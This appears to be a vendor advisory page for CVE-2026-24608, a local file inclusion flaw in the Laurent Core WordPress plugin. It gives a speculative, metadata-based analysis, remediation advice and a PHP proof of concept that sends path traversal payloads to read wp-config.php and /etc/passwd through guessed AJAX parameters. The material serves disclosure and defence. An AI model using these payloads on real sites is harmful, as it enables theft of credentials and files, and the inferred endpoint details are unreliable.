Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24608: Laurent Core <= 2.4.1 – Authenticated (Contributor+) Local File Inclusion (laurent-core)

CVE ID CVE-2026-24608
Plugin laurent-core
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 2.4.1
Patched Version
Disclosed January 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24608 (metadata-based):
The Laurent Core WordPress plugin version 2.4.1 and earlier contains an authenticated Local File Inclusion vulnerability. Attackers with contributor-level or higher privileges can exploit this flaw to include arbitrary local files, potentially leading to remote code execution. The CVSS 3.1 score of 7.5 (High) reflects the significant impact when combined with file upload capabilities.

Atomic Edge research indicates the root cause is CWE-98: Improper Control of Filename for Include/Require Statement. The plugin likely uses user-controlled input to construct file paths for PHP include/require statements without proper validation. This inference is based on the CWE classification and vulnerability description. The plugin fails to sanitize or validate file path parameters before passing them to PHP file inclusion functions. No code diff confirms this, but the CWE pattern matches typical WordPress plugin vulnerabilities where dynamic template loading or file retrieval mechanisms accept unsanitized input.

Exploitation requires authenticated access at the contributor level or higher. Attackers would identify a vulnerable endpoint, likely an AJAX handler or admin page that accepts a file path parameter. They would send a crafted request containing a local file path (e.g., ../../wp-config.php) or a path to an uploaded file containing PHP code. The plugin includes and executes the specified file’s contents. Common WordPress endpoints for such vulnerabilities include /wp-admin/admin-ajax.php with an action parameter like laurent_core_action, or direct access to plugin files in /wp-content/plugins/laurent-core/.

Remediation requires implementing strict validation of user-supplied file paths. The plugin should restrict included files to a whitelist of allowed files within the plugin directory. Path traversal sequences (../) must be filtered. The plugin should use basename() functions to extract only filenames, not full paths. Input validation should occur before any file system operations. WordPress nonce verification and capability checks should also be present, though the vulnerability description suggests these were insufficient.

Successful exploitation leads to arbitrary PHP code execution on the server. Attackers can read sensitive files like wp-config.php containing database credentials. They can execute operating system commands. The vulnerability description notes attackers can combine this with file upload capabilities to include uploaded malicious files. This bypasses WordPress security controls and can result in complete site compromise, data theft, and server takeover.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24608 - Laurent Core <= 2.4.1 - Authenticated (Contributor+) Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2026-24608
 * Assumptions based on CWE-98 and WordPress plugin patterns:
 * 1. The plugin has an AJAX endpoint vulnerable to LFI
 * 2. The endpoint accepts a file path parameter
 * 3. Contributor-level authentication is required
 * 4. Nonce verification may be present but insufficient
 */

$target_url = 'https://target-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check if login succeeded by looking for dashboard elements
if (strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Attempt exploitation via assumed AJAX endpoint
// Based on plugin slug, likely action parameter is 'laurent_core_*'
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Test 1: Path traversal to read wp-config.php
$payload = [
    'action' => 'laurent_core_load_template', // Inferred parameter name
    'file' => '../../../wp-config.php', // Path traversal payload
    // Nonce parameter may be required but is omitted here as vulnerability may bypass it
    '_wpnonce' => '' // Placeholder for nonce if required
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
$response = curl_exec($ch);

// Check for evidence of successful inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "[SUCCESS] wp-config.php likely included. Response snippet:n";
    echo substr($response, 0, 500) . "...n";
} else {
    echo "[INFO] Initial payload may have failed. Trying alternative endpoints.n";
    
    // Test 2: Alternative parameter names common in WordPress plugins
    $alternative_params = ['template', 'path', 'include', 'view', 'page'];
    foreach ($alternative_params as $param) {
        $payload = [
            'action' => 'laurent_core_action',
            $param => '../../../../etc/passwd'
        ];
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
        $response = curl_exec($ch);
        if (strpos($response, 'root:') !== false) {
            echo "[SUCCESS] LFI successful with parameter '$param'.n";
            break;
        }
    }
}

curl_close($ch);
unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School